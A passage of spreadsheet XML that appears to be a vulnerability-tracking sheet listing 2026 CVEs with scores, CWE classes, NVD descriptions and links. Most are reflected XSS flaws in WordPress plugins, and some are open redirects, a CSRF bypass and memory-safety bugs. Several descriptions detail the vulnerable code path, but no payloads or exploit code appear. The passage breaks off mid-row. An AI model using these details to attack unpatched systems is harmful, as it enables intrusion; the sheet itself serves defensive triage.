      <c r="J4299" s="5" t="inlineStr"/>
      <c r="K4299" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L4299" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow an authenticated miscreant 
with "DNA Authority - Operator" privilege to tamper with serialized 
data, potentially resulting in code execution during deserialization 
under the privilege of Enterprise SCADA security group "DNA Apps".</t>
        </is>
      </c>
      <c r="M4299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7639</t>
        </is>
      </c>
    </row>
    <row r="4300">
      <c r="A4300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18090</t>
        </is>
      </c>
      <c r="C4300" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4300" s="5" t="inlineStr"/>
      <c r="F4300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4300" s="5" t="inlineStr"/>
      <c r="H4300" s="5" t="inlineStr"/>
      <c r="I4300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4300" s="5" t="inlineStr"/>
      <c r="K4300" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4300" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in gdk-pixbuf. This vulnerability allows a remote attacker to cause a heap out-of-bounds read by providing a specially crafted Apple Icon Image (.icns) file. The uncompress() function, which handles RLE-encoded ICNS icon data, fails to validate the source buffer's boundaries during decompression. This can lead to a denial of service, where the application crashes, or to information disclosure, potentially revealing sensitive data from adjacent memory.</t>
        </is>
      </c>
      <c r="M4300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t>
        </is>
      </c>
    </row>
    <row r="4301">
      <c r="A4301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18330</t>
        </is>
      </c>
      <c r="C4301" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4301" s="5" t="inlineStr"/>
      <c r="F4301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4301" s="5" t="inlineStr"/>
      <c r="H4301" s="5" t="inlineStr"/>
      <c r="I4301" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4301" s="5" t="inlineStr"/>
      <c r="K4301" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L4301" s="5" t="inlineStr">
        <is>
          <t>A hard-coded
cryptographic key vulnerability exists in the web module of TP-Link Archer
AX55 v4. A LAN attacker who captures an HTTP login session may use the known
shared RSA private key to decrypt the administrator password; the
weakened AES session key further reduces the effort required to
compromise session confidentiality.
Successful
exploitation may disclose the administrator password captured from an HTTP
login session and compromise session confidentiality.</t>
        </is>
      </c>
      <c r="M4301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18330</t>
        </is>
      </c>
    </row>
    <row r="4302">
      <c r="A4302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18562</t>
        </is>
      </c>
      <c r="C4302" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4302" s="5" t="inlineStr"/>
      <c r="F4302" s="5" t="inlineStr"/>
      <c r="G4302" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4302" s="5" t="inlineStr"/>
      <c r="I4302" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4302" s="5" t="inlineStr"/>
      <c r="K4302" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4302" s="5" t="inlineStr">
        <is>
          <t>The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via SEO-friendly permalink filter URL segments in versions up to, and including, 1.4.3. This is due to insufficient input sanitization and output escaping in the wp_load_js() function, which reads filter values from the URL path via the url_request extension's parse_url_query() and embeds them into an inline JavaScript string using json_encode() without escaping single quotes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="M4302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18562</t>
        </is>
      </c>
    </row>
    <row r="4303">
      <c r="A4303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18843</t>
        </is>
      </c>
      <c r="C4303" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4303" s="5" t="inlineStr"/>
      <c r="F4303" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4303" s="5" t="inlineStr"/>
      <c r="H4303" s="5" t="inlineStr"/>
      <c r="I4303" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4303" s="5" t="inlineStr"/>
      <c r="K4303" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4303" s="5" t="inlineStr">
        <is>
          <t>The Beaver Builder Plugin (Starter Version) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'no_results_message' node_preview Parameter in all versions up to, and including, 2.11.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="M4303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18843</t>
        </is>
      </c>
    </row>
    <row r="4304">
      <c r="A4304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18964</t>
        </is>
      </c>
      <c r="C4304" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4304" s="5" t="inlineStr"/>
      <c r="F4304" s="5" t="inlineStr"/>
      <c r="G4304" s="5" t="inlineStr"/>
      <c r="H4304" s="5" t="inlineStr"/>
      <c r="I4304" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4304" s="5" t="inlineStr"/>
      <c r="K4304" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4304" s="5" t="inlineStr">
        <is>
          <t>The Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. WordPress's server-side HTML encoding of the 's' search parameter in the &amp;lt;title&amp;gt; element is bypassed because the browser DOM API decodes HTML entities when jQuery's .text() method reads document.title, returning literal special characters that are then embedded unescaped into the constructed HTML attribute value.</t>
        </is>
      </c>
      <c r="M4304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18964</t>
        </is>
      </c>
    </row>
    <row r="4305">
      <c r="A4305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19727</t>
        </is>
      </c>
      <c r="C4305" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4305" s="5" t="inlineStr"/>
      <c r="F4305" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4305" s="5" t="inlineStr"/>
      <c r="H4305" s="5" t="inlineStr"/>
      <c r="I4305" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4305" s="5" t="inlineStr"/>
      <c r="K4305" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4305" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows XSS Targeting HTML Attributes.
This issue affects Library Information and Document Automation Program: before v22.2.</t>
        </is>
      </c>
      <c r="M4305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19727</t>
        </is>
      </c>
    </row>
    <row r="4306">
      <c r="A4306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19797</t>
        </is>
      </c>
      <c r="C4306" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4306" s="5" t="inlineStr"/>
      <c r="F4306" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4306" s="5" t="inlineStr"/>
      <c r="H4306" s="5" t="inlineStr"/>
      <c r="I4306" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4306" s="5" t="inlineStr"/>
      <c r="K4306" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4306" s="5" t="inlineStr">
        <is>
          <t>The User Access Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab_group_section' parameter in all versions up to, and including, 2.3.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</t>
        </is>
      </c>
      <c r="M4306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19797</t>
        </is>
      </c>
    </row>
    <row r="4307">
      <c r="A4307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19872</t>
        </is>
      </c>
      <c r="C4307" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4307" s="5" t="inlineStr"/>
      <c r="F4307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4307" s="5" t="inlineStr"/>
      <c r="H4307" s="5" t="inlineStr"/>
      <c r="I4307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4307" s="5" t="inlineStr"/>
      <c r="K4307" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4307" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410000 for Perl allow cross-site scripting via a submitted value rendered unescaped in an error message.
The wrappers and renderers that emit a form's errors interpolate the error string straight into HTML with no escaping. Two of the library's own messages, no_match and not_allowed, splice the submitted value into that string, and a failing type constraint puts the rejected value into the message it builds, which _apply_actions hands to add_error.
A field declared with a check regexp, a check list or a type constraint reaches those messages, with no custom validator and no non-default configuration. Errors rendered through an application's own escaping template layer rather than the library's rendering roles are not affected.
A request over the network that submits markup to such a field gets it back live inside the error span, running script in the victim's origin. Re-rendering a rejected value later gives the stored variant.</t>
        </is>
      </c>
      <c r="M4307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t>
        </is>
      </c>
    </row>
    <row r="4308">
      <c r="A4308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19985</t>
        </is>
      </c>
      <c r="C4308" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4308" s="5" t="inlineStr"/>
      <c r="F4308" s="5" t="inlineStr"/>
      <c r="G4308" s="5" t="inlineStr"/>
      <c r="H4308" s="5" t="inlineStr"/>
      <c r="I4308" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4308" s="5" t="inlineStr"/>
      <c r="K4308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4308" s="5" t="inlineStr">
        <is>
          <t>The Relevanssi – A Better Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.28.1 via the 's', 'post_types', and 'orderby' request parameters. This is due to insufficient input sanitization and output escaping in the relevanssi_debug_array() function in lib/debug.php, which dumps user-supplied query variables through print_r() inside a &lt;pre&gt; block without HTML escaping. The debug path is enabled by supplying the relevanssi_debug=on request parameter when the administrator has previously enabled the 'Debugging mode' setting; the gate itself is a configuration check with no capability, nonce, or logged-in check (the vendor explicitly suppresses nonce verification on that line). This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="M4308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19985</t>
        </is>
      </c>
    </row>
    <row r="4309">
      <c r="A4309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21094</t>
        </is>
      </c>
      <c r="C4309" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4309" s="5" t="inlineStr"/>
      <c r="F4309" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4309" s="5" t="inlineStr"/>
      <c r="H4309" s="5" t="inlineStr"/>
      <c r="I4309" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4309" s="5" t="inlineStr"/>
      <c r="K4309" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4309" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in wpa_supplicant prior to SMR Sep-2026 Release 1 allows adjacent attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="M4309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21094</t>
        </is>
      </c>
    </row>
    <row r="4310">
      <c r="A4310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22029</t>
        </is>
      </c>
      <c r="C4310" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4310" s="5" t="inlineStr"/>
      <c r="F4310" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4310" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4310" s="5" t="inlineStr">
        <is>
          <t>shopify:react-router, shopify:remix-run\/react</t>
        </is>
      </c>
      <c r="I4310" s="5" t="inlineStr">
        <is>
          <t>2026-01-10</t>
        </is>
      </c>
      <c r="J4310" s="5" t="inlineStr"/>
      <c r="K4310" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4310" s="5" t="inlineStr">
        <is>
          <t>React Router is a router for React. In @remix-run/router version prior to 1.23.2 and react-router 7.0.0 through 7.11.0, React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect. There is no impact if Declarative Mode (&lt;BrowserRouter&gt;) is being used. This issue has been patched in @remix-run/router version 1.23.2 and react-router version 7.12.0.</t>
        </is>
      </c>
      <c r="M4310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22029</t>
        </is>
      </c>
    </row>
    <row r="4311">
      <c r="A4311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30250</t>
        </is>
      </c>
      <c r="C4311" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4311" s="5" t="inlineStr"/>
      <c r="F4311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4311" s="5" t="inlineStr"/>
      <c r="H4311" s="5" t="inlineStr"/>
      <c r="I4311" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4311" s="5" t="inlineStr"/>
      <c r="K4311" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4311" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability in the user documentation field in Beta Systems Software AG ANOW! Automate v.3.3.1.90 allows a remote attacker to execute arbitrary code</t>
        </is>
      </c>
      <c r="M4311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30250</t>
        </is>
      </c>
    </row>
    <row r="4312">
      <c r="A4312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32773</t>
        </is>
      </c>
      <c r="C4312" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4312" s="5" t="inlineStr"/>
      <c r="F4312" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4312" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H4312" s="5" t="inlineStr">
        <is>
          <t>apache:spark</t>
        </is>
      </c>
      <c r="I4312" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4312" s="5" t="inlineStr"/>
      <c r="K4312" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L4312" s="5" t="inlineStr">
        <is>
          <t>There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later.
This CVE is marked as "low" since the path to exploit requires both relatively high permissions (ability to launch a Spark job) and requires tricking a user with higher permissions to log in and visit the Spark history web page.
Users are encouraged to upgrade their Spark history servers to Spark 3.5.8 or later.</t>
        </is>
      </c>
      <c r="M4312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32773</t>
        </is>
      </c>
    </row>
    <row r="4313">
      <c r="A4313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37710</t>
        </is>
      </c>
      <c r="C4313" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4313" s="5" t="inlineStr"/>
      <c r="F4313" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4313" s="5" t="inlineStr"/>
      <c r="H4313" s="5" t="inlineStr"/>
      <c r="I4313" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4313" s="5" t="inlineStr"/>
      <c r="K4313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4313" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Omeka S v.4.2.0 allows a remote attacker to execute arbitrary code via the site navigation custom URL function</t>
        </is>
      </c>
      <c r="M4313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37710</t>
        </is>
      </c>
    </row>
    <row r="4314">
      <c r="A4314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47883</t>
        </is>
      </c>
      <c r="C4314" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4314" s="5" t="inlineStr"/>
      <c r="F4314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4314" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H4314" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I4314" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J4314" s="5" t="inlineStr"/>
      <c r="K4314" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L4314" s="5" t="inlineStr">
        <is>
          <t>UrlHandlerFilter can be vulnerable to an open redirect when configured with very broadly matching patterns. The issue applies to the filter variants in both Spring MVC and Spring WebFlux.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19</t>
        </is>
      </c>
      <c r="M4314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47883</t>
        </is>
      </c>
    </row>
    <row r="4315">
      <c r="A4315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47887</t>
        </is>
      </c>
      <c r="C4315" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4315" s="5" t="inlineStr"/>
      <c r="F4315" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4315" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H4315" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I4315" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J4315" s="5" t="inlineStr"/>
      <c r="K4315" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L4315" s="5" t="inlineStr">
        <is>
          <t>A Spring MVC application that uses UrlFileNameViewController that is mapped with an end-of-path, and does not have a configured prefix is vulnerable to an open redirect.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M4315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47887</t>
        </is>
      </c>
    </row>
    <row r="4316">
      <c r="A4316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48551</t>
        </is>
      </c>
      <c r="C4316" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4316" s="5" t="inlineStr"/>
      <c r="F4316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4316" s="5" t="inlineStr"/>
      <c r="H4316" s="5" t="inlineStr"/>
      <c r="I4316" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4316" s="5" t="inlineStr"/>
      <c r="K4316" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4316" s="5" t="inlineStr">
        <is>
          <t>Nagios Core before 4.5.14 and Nagios XI before 2026R1.7 contain a cross-site request forgery protection bypass via a self-supplied double-submit cookie. An attacker can supply matching cookie and request parameter values to bypass CSRF protection, enabling unauthenticated attackers to run commands as authorized users via malicious links.</t>
        </is>
      </c>
      <c r="M4316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48551</t>
        </is>
      </c>
    </row>
    <row r="4317">
      <c r="A4317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50771</t>
        </is>
      </c>
      <c r="C4317" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4317" s="5" t="inlineStr"/>
      <c r="F4317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4317" s="5" t="inlineStr"/>
      <c r="H4317" s="5" t="inlineStr"/>
      <c r="I4317" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4317" s="5" t="inlineStr"/>
      <c r="K4317" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4317" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Squirro Cognitive Search &lt; 3.14.2 allows a remote attacker to execute arbtirary code via the Email Notification, Create Evaluation Sets and HTML Editor functions.</t>
        </is>
      </c>
      <c r="M4317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50771</t>
        </is>
      </c>
    </row>
    <row r="4318">
      <c r="A4318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50980</t>
        </is>
      </c>
      <c r="C4318" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4318" s="5" t="inlineStr"/>
      <c r="F4318" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4318" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4318" s="5" t="inlineStr"/>
      <c r="I4318" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4318" s="5" t="inlineStr"/>
      <c r="K4318" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4318" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting (XSS) vulnerability in the DNS lookup/management component of oPanel before v1.20.25 allows remote attackers to execute arbitrary JavaScript and perform session hijacking via a crafted DNS TXT record</t>
        </is>
      </c>
      <c r="M4318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50980</t>
        </is>
      </c>
    </row>
    <row r="4319">
      <c r="A4319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52232</t>
        </is>
      </c>
      <c r="C4319" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4319" s="5" t="inlineStr"/>
      <c r="F4319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4319" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4319" s="5" t="inlineStr"/>
      <c r="I4319" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4319" s="5" t="inlineStr"/>
      <c r="K4319" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4319" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the /logo.asp component of FS Inc S3150-8T2F Switch 2.2.0D Build 118101 allows attackers to execute arbitrary Javascript in the context of the victim's browser via a crafted URL.</t>
        </is>
      </c>
      <c r="M4319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52232</t>
        </is>
      </c>
    </row>
    <row r="4320">
      <c r="A4320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52370</t>
        </is>
      </c>
      <c r="C4320" s="5" t="n">
